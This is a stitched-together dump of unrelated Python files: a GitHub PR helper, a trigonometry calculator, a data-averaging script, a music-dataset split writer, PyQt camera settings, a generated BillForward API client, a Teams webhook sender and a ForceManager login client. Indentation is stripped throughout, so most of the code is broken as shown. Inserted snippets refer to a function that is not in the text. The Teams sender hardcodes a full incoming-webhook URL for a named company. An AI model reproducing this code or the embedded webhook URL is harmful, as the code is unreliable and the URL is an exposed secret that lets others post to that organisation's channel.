if not pr:
self._call_missing_pr_error(branch)
return pr
def get_pr_from_number(self, number):
pr = self._number_to_pr.get(number)
if not pr:
self._call_missing_pr_error(number)
return pr
def get_dependents(self, head_branch):
dependents = []
for pr in self._number_to_pr.values():
if pr.base == head_branch:
dependents.append(pr)
return dependents
def _call_missing_pr_error(self, pr_ref):
prs = [f'(#{pr.number}|{pr.compare})' for pr in self.get_sorted_prs()]
logging.error(f"could not find {pr_ref} among local PRs: {', '.join(prs)}")
exit(1)
def _fetch_prs(self):
local_branches = self._get_local_branches()
prs = []
pr_list, _, _ = self.runner.run('gh pr list --state open')
for l in pr_list.splitlines():
number = l.strip().split()[0]
pr_view, _, _ = self.runner.run(f'gh pr view {number}')
title = pr_view.partition('\n')[0]
m = re.search(r'into (\S+) from (\S+)', pr_view)
base, compare = m.groups()
if base not in local_branches or compare not in local_branches:
continue
m = re.search(r'request on GitHub: (https://\S+)', pr_view)
url = m.groups()[0]
prs.append(PR(number, base, compare, url, title))
return prs
def _get_local_branches(self):
branches = set()
out, _, _ = self.runner.run('git branch')
for l in out.splitlines():
branch = l.split()[-1].strip()
branches.add(branch)
return branches
class PR(object):
def __init__(self, number, base, compare, url, title):
self.number = number
self.base = base
self.compare = compare
self.url = url
self.title = title
@staticmethod
def from_dict(d):
return PR(d['number'], d['base'], d['compare'], d['url'], d['title'])
def __repr__(self):
return f'{self.title} #{self.number}: {self.base} <- {self.compare} ({self.url})'
|
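A small illustration of topologically_sorted on a two-deep PR stack; branch names, numbers, and URLs are invented:

# Hypothetical stack: master <- feature-a <- feature-b.
pr_a = PR('1', 'master', 'feature-a', 'https://example.com/pull/1', 'Add A')
pr_b = PR('2', 'feature-a', 'feature-b', 'https://example.com/pull/2', 'Add B')
for pr in topologically_sorted([pr_b, pr_a]):
    print(pr.compare)  # prints feature-a, then feature-b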
# Sine, cosine and tangent calculator
from math import radians, cos, sin, tan
angulo = float(input('\033[1;45mEnter the angle you want:\033[m '))
seno = sin(radians(angulo))
print('The angle {} has a sine of {:.2f}'.format(angulo, seno))
cosseno = cos(radians(angulo))
print('The angle {} has a cosine of {:.2f}'.format(angulo, cosseno))
tangente = tan(radians(angulo))
print('The angle {} has a tangent of {:.2f}'.format(angulo, tangente)) |
#!/usr/bin/python
import os,sys
#import numpy as np
def print_usage():
    print('\n wrong number of input parameters.\n\nexample of usage:\n$ ./average.py self 5\n\nto average the self*.dat files from iteration 5 upward (stops when the next file is not found).\n')
exit()
def ReadFile(fileName):
    # Read the file and return its lines with surrounding whitespace stripped.
    with open(fileName, 'r') as f:
        file1 = f.readlines()
    file2 = []
    for lines in file1:
        file2.append(lines.strip())
    return file2
input_string_len = len(sys.argv[:])
if input_string_len != 3:
    print_usage()
print(sys.argv[:])
list_of_fileList = []
nLine = 0
fileExists = True
iteration = int(sys.argv[2])
while(fileExists):
##for ii in range(1,input_string_len):
fileName = './'+sys.argv[1]+str(iteration)+'.dat'
if os.path.isfile(fileName):
        print(fileName)
fileList = ReadFile(fileName)
list_of_fileList.append(fileList)
if nLine ==0:
nLine = len(fileList)
else:
if nLine != len(fileList):
print("error: files must be of same nature and same number of line.\nterminated.\n")
exit()
iteration+=1
    else:
        fileExists = False
# Average over however many iteration files were actually found.
nFile = len(list_of_fileList)
#nElement = 0
nElement = len(list_of_fileList[0][0].split()) - 1 #minus one because of the # character
if(nElement % 2 != 1): #must be odd
print('wrong number of columns')
exit()
fileName = './'+sys.argv[1]+'_averaged_'+ sys.argv[2]+'-'+str(iteration-1)+'.dat'
print('\noutput: '+fileName+'\n')
fileOut = open(fileName,'w')
for ii in range(nLine):
lineArray = [0.0]*nElement
if list_of_fileList[0][ii][0] == '#':
#print list_of_fileList[0][ii]
line = list_of_fileList[0][ii] + '\n'
else:
for jj in range(nFile):
#print(list_of_fileList[jj][ii][0])
lineList = list_of_fileList[jj][ii].split()
for kk in range(nElement):
lineArray[kk] += float(lineList[kk])/nFile
line = "% 3.6e " % lineArray[0]
for kk in range(nElement-2):
line +="% 3.6e % 3.6e " % (lineArray[kk+1],lineArray[kk+2])
line += "\n"
#print(lineArray)
#print(line)
fileOut.write(line)
fileOut.close()
exit()
|
import _pickle as cP
import numpy as np
import json
fw_train = open("train_gt_MSD.tsv", "w")  # output file for the train split
fw_val = open("val_gt_MSD.tsv", "w")      # output file for the validation split
fw_test = open("test_gt_MSD.tsv", "w")    # output file for the test split
train_list = cP.load(open('filtered_list_train.cP','rb'))
val_list = train_list[201680:]
train_list = train_list[0:201680]
test_list = cP.load(open('filtered_list_test.cP','rb'))
id7d_to_path = cP.load(open('7D_id_to_path.pkl','rb'))
idmsd_to_id7d = cP.load(open('MSD_id_to_7D_id.pkl','rb'))
idmsd_to_tag = cP.load(open('msd_id_to_tag_vector.cP','rb'))
for idmsd in train_list:
gt = np.squeeze(idmsd_to_tag[idmsd]).astype(int)
fw_train.write(str(idmsd) + '\t' + str(gt.tolist()) + '\n')
print('Train, done!')
for idmsd in val_list:
gt = np.squeeze(idmsd_to_tag[idmsd]).astype(int)
fw_val.write(str(idmsd) + '\t' + str(gt.tolist()) + '\n')
print('Validation, done!')
for idmsd in test_list:
gt = np.squeeze(idmsd_to_tag[idmsd]).astype(int)
fw_test.write(str(idmsd) + '\t' + str(gt.tolist()) + '\n')
print('ALL done!')
|
from time import sleep
from PyQt5.QtWidgets import *
from PyQt5.QtCore import pyqtSignal, pyqtSlot
from PyQt5.QtGui import QIcon
class SetResolutionDropDown(QComboBox):
# start and stop signals declaration
sig_start_thread = pyqtSignal()
sig_stop_thread = pyqtSignal()
def __init__(self, camera):
super(SetResolutionDropDown, self).__init__()
# announce camera handle
self.camera = camera
# initialise box items
self.initbox()
def initbox(self):
# available choice of resolutions
self.addItem('3280x2464 (extra GPU ram must be allocated)')
self.addItem('1640x1232')
self.addItem('1640x922')
self.addItem('1280x720')
self.addItem('1920x1080')
self.addItem('640x480')
# set to currently chosen resolution
current_resolution = str(self.camera.resolution)
if (current_resolution[0] == '3'):
self.setCurrentText('3280x2464 (extra GPU ram must be allocated)')
else:
self.setCurrentText(current_resolution)
# connect to resolution changer function
self.currentTextChanged.connect(self.res_changer)
@pyqtSlot(str)
def res_changer(self, res_in):
# in case previewing is on, switch off and wait to give
# thread time to finish
restart = False
if (self.camera.preview_state == True):
self.sig_stop_thread.emit()
sleep(0.5)
restart = True
# change camera resolution, include special case for extra text in '3280...'
if (res_in[0] == '3'):
self.camera.resolution = '3280x2464'
else:
self.camera.resolution = res_in
# restart preview thread if was on before
if restart:
self.sig_start_thread.emit()
        print('Successfully changed resolution to:', self.camera.resolution)
class SetResolution(QWidget):
def __init__(self, parent, camera):
super(SetResolution, self).__init__(parent)
# announce camera handle
self.camera = camera
# initialise user interface
self.initUI()
def initUI(self):
# set layout
setres_layout = QHBoxLayout()
# get widgets
self.text = QLabel('Resolution:')
self.dropdown = SetResolutionDropDown(self.camera)
# add widgets to layout
setres_layout.addWidget(self.text)
setres_layout.addWidget(self.dropdown)
# set setres_layout as widget layout
self.setLayout(setres_layout)
class SettingsWindow(QDialog):
def __init__(self, parent, camera):
super(SettingsWindow, self).__init__(parent)
# announce parent (main window)
self.main_window = parent
# announce camera handle
self.camera = camera
# initialise user interface
self.initUI()
# connect signals and slot
self.sigslot_connector()
def initUI(self):
# set title
self.setWindowTitle('Camera Settings')
# set layout
settings_layout = QVBoxLayout()
# get widgets
self.setting_resolution = SetResolution(self.main_window, self.camera)
# add widgets to layout
settings_layout.addWidget(self.setting_resolution)
# set settings_layout as widget layout
self.setLayout(settings_layout)
# set window geometry
self.setFixedSize(settings_layout.sizeHint())
def sigslot_connector(self):
# connect capture preview buttons, for change in resolution
self.setting_resolution.dropdown.sig_start_thread.connect(self.main_window.camerasection.previewwindow.start_preview_thread)
self.setting_resolution.dropdown.sig_stop_thread.connect(self.main_window.camerasection.previewwindow.stop_preview_thread)
class CameraSettingsButton(QPushButton):
def __init__(self, parent, camera):
super(CameraSettingsButton, self).__init__(QIcon('resources/settings.svg'), ' Camera Settings', parent)
# announce main window parent and camera
self.parent = parent
self.camera = camera
# connect
self.clicked.connect(self.open_settings)
def open_settings(self):
# create and open settings window dialog box,
# with handle on camera object
settings = SettingsWindow(self.parent, self.camera)
settings.show()
|
# coding: utf-8
"""
BillForward REST API
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class OrganizationsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_organization(self, organization, **kwargs):
"""
Create an organization.
{\"nickname\":\"Create\",\"request\":\"createOrganizationRequest.html\",\"response\":\"createOrganizationResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_organization(organization, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
        :param Organization organization: The organization object to be created. (required)
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_organization_with_http_info(organization, **kwargs)
else:
(data) = self.create_organization_with_http_info(organization, **kwargs)
return data
def create_organization_with_http_info(self, organization, **kwargs):
"""
Create an organization.
{\"nickname\":\"Create\",\"request\":\"createOrganizationRequest.html\",\"response\":\"createOrganizationResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_organization_with_http_info(organization, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
        :param Organization organization: The organization object to be created. (required)
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organization']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_organization" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'organization' is set
if ('organization' not in params) or (params['organization'] is None):
raise ValueError("Missing the required parameter `organization` when calling `create_organization`")
resource_path = '/organizations'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'organization' in params:
body_params = params['organization']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['text/xml', 'application/xml', 'application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrganizationPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_all_my_organizations(self, **kwargs):
"""
        Returns a collection of all my associated organizations. By default 10 values are returned. Records are returned in natural order.
{\"nickname\":\"Get Mine\",\"response\":\"getOrganizationAll.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_all_my_organizations(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first organization to return.
:param int records: The maximum number of organizations to return.
:param str order_by: Specify a field used to order the result set.
        :param str order: The direction of any ordering, either ASC or DESC.
        :param bool include_retired: Whether retired organizations should be returned.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_all_my_organizations_with_http_info(**kwargs)
else:
(data) = self.get_all_my_organizations_with_http_info(**kwargs)
return data
def get_all_my_organizations_with_http_info(self, **kwargs):
"""
        Returns a collection of all my associated organizations. By default 10 values are returned. Records are returned in natural order.
{\"nickname\":\"Get Mine\",\"response\":\"getOrganizationAll.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_all_my_organizations_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first organization to return.
:param int records: The maximum number of organizations to return.
:param str order_by: Specify a field used to order the result set.
        :param str order: The direction of any ordering, either ASC or DESC.
        :param bool include_retired: Whether retired organizations should be returned.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organizations', 'offset', 'records', 'order_by', 'order', 'include_retired']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_my_organizations" % key
)
params[key] = val
del params['kwargs']
resource_path = '/organizations/mine'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
if 'offset' in params:
query_params['offset'] = params['offset']
if 'records' in params:
query_params['records'] = params['records']
if 'order_by' in params:
query_params['order_by'] = params['order_by']
if 'order' in params:
query_params['order'] = params['order']
if 'include_retired' in params:
query_params['include_retired'] = params['include_retired']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrganizationPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_all_organizations(self, **kwargs):
"""
Returns a collection of all organizations. By default 10 values are returned. Records are returned in natural order.
{\"nickname\":\"Get All\",\"response\":\"getOrganizationAll.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_all_organizations(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first organization to return.
:param int records: The maximum number of organizations to return.
:param str order_by: Specify a field used to order the result set.
        :param str order: The direction of any ordering, either ASC or DESC.
        :param bool include_retired: Whether retired organizations should be returned.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_all_organizations_with_http_info(**kwargs)
else:
(data) = self.get_all_organizations_with_http_info(**kwargs)
return data
def get_all_organizations_with_http_info(self, **kwargs):
"""
Returns a collection of all organizations. By default 10 values are returned. Records are returned in natural order.
{\"nickname\":\"Get All\",\"response\":\"getOrganizationAll.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_all_organizations_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first organization to return.
:param int records: The maximum number of organizations to return.
:param str order_by: Specify a field used to order the result set.
        :param str order: The direction of any ordering, either ASC or DESC.
        :param bool include_retired: Whether retired organizations should be returned.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organizations', 'offset', 'records', 'order_by', 'order', 'include_retired']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_organizations" % key
)
params[key] = val
del params['kwargs']
resource_path = '/organizations'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
if 'offset' in params:
query_params['offset'] = params['offset']
if 'records' in params:
query_params['records'] = params['records']
if 'order_by' in params:
query_params['order_by'] = params['order_by']
if 'order' in params:
query_params['order'] = params['order']
if 'include_retired' in params:
query_params['include_retired'] = params['include_retired']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrganizationPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_organization_by_customer_code(self, customer_code, **kwargs):
"""
Returns a single organization, specified by the customer-code parameter.
{\"nickname\":\"Retrieve by Customer-Code\",\"response\":\"getOrganizationByCustomer.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_organization_by_customer_code(customer_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str customer_code: The unique customer code of the organization. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_organization_by_customer_code_with_http_info(customer_code, **kwargs)
else:
(data) = self.get_organization_by_customer_code_with_http_info(customer_code, **kwargs)
return data
def get_organization_by_customer_code_with_http_info(self, customer_code, **kwargs):
"""
Returns a single organization, specified by the customer-code parameter.
{\"nickname\":\"Retrieve by Customer-Code\",\"response\":\"getOrganizationByCustomer.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_organization_by_customer_code_with_http_info(customer_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str customer_code: The unique customer code of the organization. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['customer_code', 'organizations']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_organization_by_customer_code" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'customer_code' is set
if ('customer_code' not in params) or (params['customer_code'] is None):
raise ValueError("Missing the required parameter `customer_code` when calling `get_organization_by_customer_code`")
resource_path = '/organizations/customer-code/{customer-code}'.replace('{format}', 'json')
path_params = {}
if 'customer_code' in params:
path_params['customer-code'] = params['customer_code']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrganizationPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_organization_by_id(self, organization_id, **kwargs):
"""
Returns a single Organization, specified by the organization-ID parameter.
{\"nickname\":\"Retrieve by id\",\"response\":\"getOrganizationByID.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_organization_by_id(organization_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: ID of the organization. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_organization_by_id_with_http_info(organization_id, **kwargs)
else:
(data) = self.get_organization_by_id_with_http_info(organization_id, **kwargs)
return data
def get_organization_by_id_with_http_info(self, organization_id, **kwargs):
"""
Returns a single Organization, specified by the organization-ID parameter.
{\"nickname\":\"Retrieve by id\",\"response\":\"getOrganizationByID.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_organization_by_id_with_http_info(organization_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: ID of the organization. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organization_id', 'organizations']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_organization_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in params) or (params['organization_id'] is None):
raise ValueError("Missing the required parameter `organization_id` when calling `get_organization_by_id`")
resource_path = '/organizations/{organization-ID}'.replace('{format}', 'json')
path_params = {}
if 'organization_id' in params:
path_params['organization-ID'] = params['organization_id']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrganizationPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_organization_by_name(self, name, **kwargs):
"""
Returns a single Organization, specified by the name parameter.
{\"nickname\":\"Retrieve by Name\",\"response\":\"getOrganizationByName.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_organization_by_name(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: The name of the Organization. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_organization_by_name_with_http_info(name, **kwargs)
else:
(data) = self.get_organization_by_name_with_http_info(name, **kwargs)
return data
def get_organization_by_name_with_http_info(self, name, **kwargs):
"""
Returns a single Organization, specified by the name parameter.
{\"nickname\":\"Retrieve by Name\",\"response\":\"getOrganizationByName.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_organization_by_name_with_http_info(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: The name of the Organization. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'organizations']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_organization_by_name" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_organization_by_name`")
resource_path = '/organizations/name/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrganizationPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def update_organization(self, organization, **kwargs):
"""
Update an organization.
{\"nickname\":\"Updated\",\"request\":\"updateOrganizationRequest.html\",\"response\":\"updateOrganizationResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_organization(organization, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Organization organization: The organization object to be updated. (required)
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_organization_with_http_info(organization, **kwargs)
else:
(data) = self.update_organization_with_http_info(organization, **kwargs)
return data
def update_organization_with_http_info(self, organization, **kwargs):
"""
Update an organization.
{\"nickname\":\"Updated\",\"request\":\"updateOrganizationRequest.html\",\"response\":\"updateOrganizationResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_organization_with_http_info(organization, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Organization organization: The organization object to be updated. (required)
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organization']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_organization" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'organization' is set
if ('organization' not in params) or (params['organization'] is None):
raise ValueError("Missing the required parameter `organization` when calling `update_organization`")
resource_path = '/organizations'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'organization' in params:
body_params = params['organization']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['text/xml', 'application/xml', 'application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrganizationPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
|
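A hedged usage sketch for the generated client above; the host, credentials, and import path depend on how the swagger package was generated and configured:

# Hypothetical usage -- assumes Configuration/ApiClient are set up
# with a valid host and credentials elsewhere.
api = OrganizationsApi()
page = api.get_all_organizations(records=5, order='ASC')
print(page)  # an OrganizationPagedMetadata instance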
import pymsteams
webhook = r"https://syngenta.webhook.office.com/webhookb2/c198a158-9e58-4a3d-b9ed-746cb4fadfbd@06219a4a-a835-44d5-afaf-3926343bfb89/IncomingWebhook/2dc314fc05fc4d34bebc1e229991afbb/894ff72d-5ee9-4a9b-82b8-5996a7f82d79"
section1 = pymsteams.cardsection()
section1.title('Introduction')
section1.text('Introductory text')
section2 = pymsteams.cardsection()
section2.title('Development')
section2.activityTitle('Activity title')
section2.activitySubtitle('Activity subtitle')
section2.activityText('Activity text')
section2.addFact('Name', 'Nessa')
section2.addFact('Username', 'S1024501')
message = pymsteams.connectorcard(webhook)
message.text('Test card with activity and facts')
message.color('f731bc')
message.addSection(section1)
message.addSection(section2)
#message.printme()
message.send()
|
import requests
from exceptions import AuthenticationError
import json
class Client:
def __init__(self):
self.base_url = 'https://api.forcemanager.net/api/v4'
self.api_key = ""
self.private_key = ""
self.headers = {'Accept': '*/*', 'Content-Type': 'application/json'}
self.fm_token = ""
self.logged_in = False
def login(self, username=None, password=None):
_api_key = username or self.api_key
_private_key = password or self.private_key
response = requests.post('%s/login' % self.base_url, json={"username": _api_key, "password": _private_key})
        body = response.json()  # avoid shadowing the imported json module
        self.fm_token = body['token']
self.headers["X-Session-Key"] = self.fm_token
self.logged_in = True
return True
